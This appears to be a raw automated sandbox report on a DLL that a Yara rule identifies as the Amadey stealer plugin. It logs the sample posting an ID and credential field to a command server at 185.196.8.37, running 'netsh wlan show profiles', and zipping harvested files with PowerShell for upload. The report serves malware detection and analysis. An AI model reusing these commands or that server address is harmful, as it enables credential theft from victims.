    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1518302251.0000016315491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/5
    Source: rundll32.exe, 00000006.00000002.1513737500.000001E8C5C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1584469285.000001D6A168A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php#
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php%
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1518302251.000001631540C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1518302251.0000016315491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1(
    Source: rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1=
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1XyH
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1b
    Source: rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1es5
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1rer
    Source: rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1s
    Source: rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/ds
    Source: rundll32.exe, 00000007.00000002.1518302251.0000016315491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/indows.Explorer_RecentFiles_
    Source: rundll32.exe, 00000007.00000002.1518302251.0000016315491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/lorer_RecentFilesl
    Source: rundll32.exe, 00000006.00000002.1514598239.000001E8C7BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/t%
    Source: powershell.exe, 00000016.00000002.1572082555.00000191CB91E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C920496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1419781847.0000025AB8226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA9A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C91ECF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA83D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C91EAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA81B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B35D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C91ECF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA83D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000016.00000002.1570736869.00000191CB89A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C91EAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA81B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B35D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C9200F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA97DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1401642278.00000191B4BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000E.00000002.1356866325.000002C920496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1419781847.0000025AB8226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA9A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: cred64.dll.dll, type: SAMPLEMatched rule: Finds Amadey\'s stealer plugin based on characteristic strings Author: Sekoia.io
    Source: cred64.dll.dll, type: SAMPLEMatched rule: loader_amadey_stealer_plugin author = Sekoia.io, description = Finds Amadey\'s stealer plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 50154e39-98b3-40e5-8986-18bbb7b15647
    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@32/22@0/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
    Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\_Files_\Jump to behavior
    Source: cred64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
    Source: rundll32.exe, 00000006.00000002.1513737500.000001E8C5BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1518302251.000001631540C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1584469285.000001D6A1628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: cred64.dll.dllReversingLabs: Detection: 68%
    Source: cred64.dll.dllVirustotal: Detection: 77%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,MainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,SaveJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",MainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",SaveJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
